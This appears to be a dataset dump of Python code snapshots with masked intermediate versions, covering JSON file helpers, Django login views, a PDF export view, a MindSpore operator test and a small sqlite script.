"step-1": "<mask token>\n\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\n\n<mask token>\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\n\n<mask token>\n\n\nclass LineNumberTracker:\n \"\"\"\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n \"\"\"\n\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n elif is_add:\n line_num += end - start\n else:\n line_num -= end - start\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n",
"step-2": "<mask token>\n\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\n\n<mask token>\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\n\ndef is_repo_path(path):\n return os.path.isdir(path) and '.git' in os.listdir(path)\n\n\nclass LineNumberTracker:\n \"\"\"\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n \"\"\"\n\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n elif is_add:\n line_num += end - start\n else:\n line_num -= end - start\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n",
"step-3": "<mask token>\n\n\ndef load_json_if_exists(path):\n if not os.path.isfile(path):\n return {}\n with open(path) as f:\n return json.load(f)\n\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\n\ndef get_folder_paths(directory):\n return [os.path.join(directory, f) for f in os.listdir(directory) if os\n .path.isdir(os.path.join(directory, f))]\n\n\ndef file_to_lines(file_path):\n if len(file_path) == 0:\n return []\n with open(file_path) as f:\n lines = list(f.read().splitlines())\n return lines\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\n\ndef is_repo_path(path):\n return os.path.isdir(path) and '.git' in os.listdir(path)\n\n\nclass LineNumberTracker:\n \"\"\"\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n \"\"\"\n\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n elif is_add:\n line_num += end - start\n else:\n line_num -= end - start\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n",
"step-4": "import os\nimport json\n\n\ndef load_json_if_exists(path):\n if not os.path.isfile(path):\n return {}\n with open(path) as f:\n return json.load(f)\n\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\n\ndef get_folder_paths(directory):\n return [os.path.join(directory, f) for f in os.listdir(directory) if os\n .path.isdir(os.path.join(directory, f))]\n\n\ndef file_to_lines(file_path):\n if len(file_path) == 0:\n return []\n with open(file_path) as f:\n lines = list(f.read().splitlines())\n return lines\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\n\ndef is_repo_path(path):\n return os.path.isdir(path) and '.git' in os.listdir(path)\n\n\nclass LineNumberTracker:\n \"\"\"\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n \"\"\"\n\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n elif is_add:\n line_num += end - start\n else:\n line_num -= end - start\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n",
"step-5": "import os\nimport json\n\n\ndef load_json_if_exists(path):\n if not os.path.isfile(path):\n return {}\n with open(path) as f:\n return json.load(f)\n\ndef json_dump(obj, file_path):\n with open(file_path, 'w') as f:\n json.dump(obj, f)\n\ndef get_folder_paths(directory):\n return [os.path.join(directory, f) for f in os.listdir(directory) if os.path.isdir(os.path.join(directory, f))]\n\n\ndef file_to_lines(file_path):\n if len(file_path) == 0:\n return []\n with open(file_path) as f:\n lines = list(f.read().splitlines())\n return lines\n\n\ndef get_repo_path(file_path):\n if os.path.isfile(file_path):\n folder_path = os.path.abspath(os.path.join(file_path, os.pardir))\n else:\n folder_path = file_path\n for i in range(100):\n if folder_path == '/':\n return None\n if is_repo_path(folder_path):\n break\n folder_path = os.path.abspath(os.path.join(folder_path, os.pardir))\n return folder_path\n\ndef is_repo_path(path):\n return os.path.isdir(path) and '.git' in os.listdir(path)\n\nclass LineNumberTracker:\n '''\n When deleting/adding lines in a file, this allows you to translate original line numbers into transformed ones,\n '''\n def __init__(self):\n self._log = []\n\n def transform(self, line_num):\n for is_add, start, end in self._log:\n if line_num < start:\n pass\n elif line_num < end and not is_add:\n assert False, 'Line Deleted: {} {}'.format(line_num, self._log)\n else:\n if is_add:\n line_num += (end - start)\n else:\n line_num -= (end - start)\n return line_num\n\n def remove_lines(self, start, end):\n self._log.append((False, start, end))\n\n def add_lines(self, start, end):\n self._log.append((True, start, end))\n\n\n",
"step-ids": [
8,
9,
12,
13,
14
]
}
|
[
8,
9,
12,
13,
14
] |
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponse
# Create your views here.
def check(request):
if not request.user.is_authenticated:
return redirect('/auth/login/')
else:
return redirect('/worker/')
def loginpg(request):
return render(request, 'registration/login.html')
def logoutpg(request):
logout(request)
return render(request, 'registration/logout.html')
def auth(request):
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('/worker/')
else:
return render(request, 'registration/login_error.html')
|
normal
|
{
"blob_id": "fc2afc99dc754b58c36bc76c723727337851cc3e",
"index": 5326,
"step-1": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\n<mask token>\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-3": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-4": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\n\n# Create your views here.\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request) \n return render(request, 'registration/logout.html')\n\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
import json
from django.conf import settings
from pdf_generator.utils import build_pdf_stream_from
from django.http import JsonResponse
from helpers.views import ApiView
from pdf_generator.forms import PdfTempStoreForm
from pdf_generator.serializers import PdfTempStoreSerializer
class ReportPdfView(ApiView):
"""
PdfView
"""
def post(self, request, *args, **kwargs):
data = json.loads(request.body)
domain = data["domain"]
data = data["data"]
print("-- Build Report PDF Export --")
print()
# persist params in PdfTemp
store = PdfTempStoreForm({"data": data})
if store.is_valid():
store_instance = store.save()
else:
return JsonResponse({"error": "Pdf data is invalid"})
uuid = PdfTempStoreSerializer(store_instance).data["uuid"]
url = (
f"http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}"
)
# Early display pdf URL
if settings.DEBUG:
print(
"================================================================================"
)
print(url.replace("nginx", domain))
print(
"================================================================================"
)
pdf = build_pdf_stream_from(url)
store_instance.delete()
return pdf
|
normal
|
{
"blob_id": "789f95095346262a04e7de0f9f9c5df6177e8fbc",
"index": 5114,
"step-1": "<mask token>\n\n\nclass ReportPdfView(ApiView):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ReportPdfView(ApiView):\n <mask token>\n\n def post(self, request, *args, **kwargs):\n data = json.loads(request.body)\n domain = data['domain']\n data = data['data']\n print('-- Build Report PDF Export --')\n print()\n store = PdfTempStoreForm({'data': data})\n if store.is_valid():\n store_instance = store.save()\n else:\n return JsonResponse({'error': 'Pdf data is invalid'})\n uuid = PdfTempStoreSerializer(store_instance).data['uuid']\n url = (\n f'http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}'\n )\n if settings.DEBUG:\n print(\n '================================================================================'\n )\n print(url.replace('nginx', domain))\n print(\n '================================================================================'\n )\n pdf = build_pdf_stream_from(url)\n store_instance.delete()\n return pdf\n",
"step-3": "<mask token>\n\n\nclass ReportPdfView(ApiView):\n \"\"\"\n PdfView\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n data = json.loads(request.body)\n domain = data['domain']\n data = data['data']\n print('-- Build Report PDF Export --')\n print()\n store = PdfTempStoreForm({'data': data})\n if store.is_valid():\n store_instance = store.save()\n else:\n return JsonResponse({'error': 'Pdf data is invalid'})\n uuid = PdfTempStoreSerializer(store_instance).data['uuid']\n url = (\n f'http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}'\n )\n if settings.DEBUG:\n print(\n '================================================================================'\n )\n print(url.replace('nginx', domain))\n print(\n '================================================================================'\n )\n pdf = build_pdf_stream_from(url)\n store_instance.delete()\n return pdf\n",
"step-4": "import json\nfrom django.conf import settings\nfrom pdf_generator.utils import build_pdf_stream_from\nfrom django.http import JsonResponse\nfrom helpers.views import ApiView\nfrom pdf_generator.forms import PdfTempStoreForm\nfrom pdf_generator.serializers import PdfTempStoreSerializer\n\n\nclass ReportPdfView(ApiView):\n \"\"\"\n PdfView\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n data = json.loads(request.body)\n domain = data['domain']\n data = data['data']\n print('-- Build Report PDF Export --')\n print()\n store = PdfTempStoreForm({'data': data})\n if store.is_valid():\n store_instance = store.save()\n else:\n return JsonResponse({'error': 'Pdf data is invalid'})\n uuid = PdfTempStoreSerializer(store_instance).data['uuid']\n url = (\n f'http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}'\n )\n if settings.DEBUG:\n print(\n '================================================================================'\n )\n print(url.replace('nginx', domain))\n print(\n '================================================================================'\n )\n pdf = build_pdf_stream_from(url)\n store_instance.delete()\n return pdf\n",
"step-5": "# -*- coding: utf-8 -*-\nimport json\nfrom django.conf import settings\nfrom pdf_generator.utils import build_pdf_stream_from\nfrom django.http import JsonResponse\n\nfrom helpers.views import ApiView\n\nfrom pdf_generator.forms import PdfTempStoreForm\nfrom pdf_generator.serializers import PdfTempStoreSerializer\n\n\nclass ReportPdfView(ApiView):\n \"\"\"\n PdfView\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n data = json.loads(request.body)\n domain = data[\"domain\"]\n data = data[\"data\"]\n\n print(\"-- Build Report PDF Export --\")\n print()\n\n # persist params in PdfTemp\n store = PdfTempStoreForm({\"data\": data})\n if store.is_valid():\n store_instance = store.save()\n else:\n return JsonResponse({\"error\": \"Pdf data is invalid\"})\n\n uuid = PdfTempStoreSerializer(store_instance).data[\"uuid\"]\n url = (\n f\"http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}\"\n )\n # Early display pdf URL\n if settings.DEBUG:\n print(\n \"================================================================================\"\n )\n print(url.replace(\"nginx\", domain))\n print(\n \"================================================================================\"\n )\n\n pdf = build_pdf_stream_from(url)\n store_instance.delete()\n\n return pdf\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore
import mindspore.nn as nn
from mindspore.ops.operations import _grad_ops as G
from mindspore import Tensor, context
class ConcatOffsetNet(nn.Cell):
def __init__(self, axis):
super(ConcatOffsetNet, self).__init__()
self.op = G.ConcatOffset(2, axis)
def construct(self, x0, x1):
return self.op((x0, x1))
def run_case(run_mode):
context.set_context(mode=run_mode)
x0 = Tensor(np.random.uniform(10, 20, (4, 2, 16)).astype(np.float32))
x1 = Tensor(np.random.uniform(10, 20, (4, 6, 16)).astype(np.float32))
expect = np.array([[0, 0, 0], [0, 2, 0]]).astype(np.int64)
x0_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)
x1_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)
net = ConcatOffsetNet(1)
net.set_inputs(x0_dyn, x1_dyn)
output = net(x0, x1)
if run_mode == context.GRAPH_MODE:
assert np.allclose(expect, output.asnumpy())
else:
# In PyNative, set_inputs will be ignored. Static shape for ConcatOffset
# infer output is not a tensor, get constant value output.
assert np.allclose(expect, output)
@pytest.mark.level0
@pytest.mark.env_onecard
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
def test_concat_offset():
"""
Feature: aicpu ConcatOffset
Description: test ConcatOffset on Ascend.
Expectation: output compares success with expect.
"""
context.set_context(device_target="Ascend")
run_case(context.GRAPH_MODE)
run_case(context.PYNATIVE_MODE)
|
normal
|
{
"blob_id": "2064fe029bc7db14505a5b38750e324b55556abb",
"index": 7032,
"step-1": "<mask token>\n\n\nclass ConcatOffsetNet(nn.Cell):\n\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ConcatOffsetNet(nn.Cell):\n\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\n<mask token>\n\n\n@pytest.mark.level0\n@pytest.mark.env_onecard\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\ndef test_concat_offset():\n \"\"\"\n Feature: aicpu ConcatOffset\n Description: test ConcatOffset on Ascend.\n Expectation: output compares success with expect.\n \"\"\"\n context.set_context(device_target='Ascend')\n run_case(context.GRAPH_MODE)\n run_case(context.PYNATIVE_MODE)\n",
"step-3": "<mask token>\n\n\nclass ConcatOffsetNet(nn.Cell):\n\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\ndef run_case(run_mode):\n context.set_context(mode=run_mode)\n x0 = Tensor(np.random.uniform(10, 20, (4, 2, 16)).astype(np.float32))\n x1 = Tensor(np.random.uniform(10, 20, (4, 6, 16)).astype(np.float32))\n expect = np.array([[0, 0, 0], [0, 2, 0]]).astype(np.int64)\n x0_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n x1_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n net = ConcatOffsetNet(1)\n net.set_inputs(x0_dyn, x1_dyn)\n output = net(x0, x1)\n if run_mode == context.GRAPH_MODE:\n assert np.allclose(expect, output.asnumpy())\n else:\n assert np.allclose(expect, output)\n\n\n@pytest.mark.level0\n@pytest.mark.env_onecard\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\ndef test_concat_offset():\n \"\"\"\n Feature: aicpu ConcatOffset\n Description: test ConcatOffset on Ascend.\n Expectation: output compares success with expect.\n \"\"\"\n context.set_context(device_target='Ascend')\n run_case(context.GRAPH_MODE)\n run_case(context.PYNATIVE_MODE)\n",
"step-4": "import numpy as np\nimport pytest\nimport mindspore\nimport mindspore.nn as nn\nfrom mindspore.ops.operations import _grad_ops as G\nfrom mindspore import Tensor, context\n\n\nclass ConcatOffsetNet(nn.Cell):\n\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\ndef run_case(run_mode):\n context.set_context(mode=run_mode)\n x0 = Tensor(np.random.uniform(10, 20, (4, 2, 16)).astype(np.float32))\n x1 = Tensor(np.random.uniform(10, 20, (4, 6, 16)).astype(np.float32))\n expect = np.array([[0, 0, 0], [0, 2, 0]]).astype(np.int64)\n x0_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n x1_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n net = ConcatOffsetNet(1)\n net.set_inputs(x0_dyn, x1_dyn)\n output = net(x0, x1)\n if run_mode == context.GRAPH_MODE:\n assert np.allclose(expect, output.asnumpy())\n else:\n assert np.allclose(expect, output)\n\n\n@pytest.mark.level0\n@pytest.mark.env_onecard\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\ndef test_concat_offset():\n \"\"\"\n Feature: aicpu ConcatOffset\n Description: test ConcatOffset on Ascend.\n Expectation: output compares success with expect.\n \"\"\"\n context.set_context(device_target='Ascend')\n run_case(context.GRAPH_MODE)\n run_case(context.PYNATIVE_MODE)\n",
"step-5": "# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\nimport numpy as np\nimport pytest\nimport mindspore\nimport mindspore.nn as nn\nfrom mindspore.ops.operations import _grad_ops as G\nfrom mindspore import Tensor, context\n\n\nclass ConcatOffsetNet(nn.Cell):\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\ndef run_case(run_mode):\n context.set_context(mode=run_mode)\n x0 = Tensor(np.random.uniform(10, 20, (4, 2, 16)).astype(np.float32))\n x1 = Tensor(np.random.uniform(10, 20, (4, 6, 16)).astype(np.float32))\n expect = np.array([[0, 0, 0], [0, 2, 0]]).astype(np.int64)\n x0_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n x1_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n net = ConcatOffsetNet(1)\n net.set_inputs(x0_dyn, x1_dyn)\n output = net(x0, x1)\n if run_mode == context.GRAPH_MODE:\n assert np.allclose(expect, output.asnumpy())\n else:\n # In PyNative, set_inputs will be ignored. Static shape for ConcatOffset\n # infer output is not a tensor, get constant value output.\n assert np.allclose(expect, output)\n\n\n@pytest.mark.level0\n@pytest.mark.env_onecard\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\ndef test_concat_offset():\n \"\"\"\n Feature: aicpu ConcatOffset\n Description: test ConcatOffset on Ascend.\n Expectation: output compares success with expect.\n \"\"\"\n context.set_context(device_target=\"Ascend\")\n run_case(context.GRAPH_MODE)\n run_case(context.PYNATIVE_MODE)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with con:
cur = con.cursor()
cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')
cur.execute("INSERT INTO Cars VALUES(1, 'car1', 10)")
cur.execute("INSERT INTO Cars VALUES(2, 'car2', 20)")
cur.execute("INSERT INTO Cars VALUES(3, 'car3', 30)")
<|reserved_special_token_1|>
<|reserved_special_token_0|>
con = lite.connect('test.db')
with con:
cur = con.cursor()
cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')
cur.execute("INSERT INTO Cars VALUES(1, 'car1', 10)")
cur.execute("INSERT INTO Cars VALUES(2, 'car2', 20)")
cur.execute("INSERT INTO Cars VALUES(3, 'car3', 30)")
<|reserved_special_token_1|>
import sqlite3 as lite
import sys
con = lite.connect('test.db')
with con:
cur = con.cursor()
cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')
cur.execute("INSERT INTO Cars VALUES(1, 'car1', 10)")
cur.execute("INSERT INTO Cars VALUES(2, 'car2', 20)")
cur.execute("INSERT INTO Cars VALUES(3, 'car3', 30)")
<|reserved_special_token_1|>
import sqlite3 as lite
import sys
con = lite.connect("test.db")
with con:
cur = con.cursor()
cur.execute('''CREATE TABLE Cars(Id INT, Name TEXT, Price INT)''')
cur.execute('''INSERT INTO Cars VALUES(1, 'car1', 10)''')
cur.execute('''INSERT INTO Cars VALUES(2, 'car2', 20)''')
cur.execute('''INSERT INTO Cars VALUES(3, 'car3', 30)''')
|
flexible
|
{
"blob_id": "db22e568c86f008c9882181f5c1d88d5bca28570",
"index": 5416,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith con:\n cur = con.cursor()\n cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')\n cur.execute(\"INSERT INTO Cars VALUES(1, 'car1', 10)\")\n cur.execute(\"INSERT INTO Cars VALUES(2, 'car2', 20)\")\n cur.execute(\"INSERT INTO Cars VALUES(3, 'car3', 30)\")\n",
"step-3": "<mask token>\ncon = lite.connect('test.db')\nwith con:\n cur = con.cursor()\n cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')\n cur.execute(\"INSERT INTO Cars VALUES(1, 'car1', 10)\")\n cur.execute(\"INSERT INTO Cars VALUES(2, 'car2', 20)\")\n cur.execute(\"INSERT INTO Cars VALUES(3, 'car3', 30)\")\n",
"step-4": "import sqlite3 as lite\nimport sys\ncon = lite.connect('test.db')\nwith con:\n cur = con.cursor()\n cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')\n cur.execute(\"INSERT INTO Cars VALUES(1, 'car1', 10)\")\n cur.execute(\"INSERT INTO Cars VALUES(2, 'car2', 20)\")\n cur.execute(\"INSERT INTO Cars VALUES(3, 'car3', 30)\")\n",
"step-5": "import sqlite3 as lite\nimport sys\n\ncon = lite.connect(\"test.db\")\n\nwith con:\n\n cur = con.cursor()\n \n cur.execute('''CREATE TABLE Cars(Id INT, Name TEXT, Price INT)''')\n cur.execute('''INSERT INTO Cars VALUES(1, 'car1', 10)''')\n cur.execute('''INSERT INTO Cars VALUES(2, 'car2', 20)''')\n cur.execute('''INSERT INTO Cars VALUES(3, 'car3', 30)''')\n\n\n\n \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.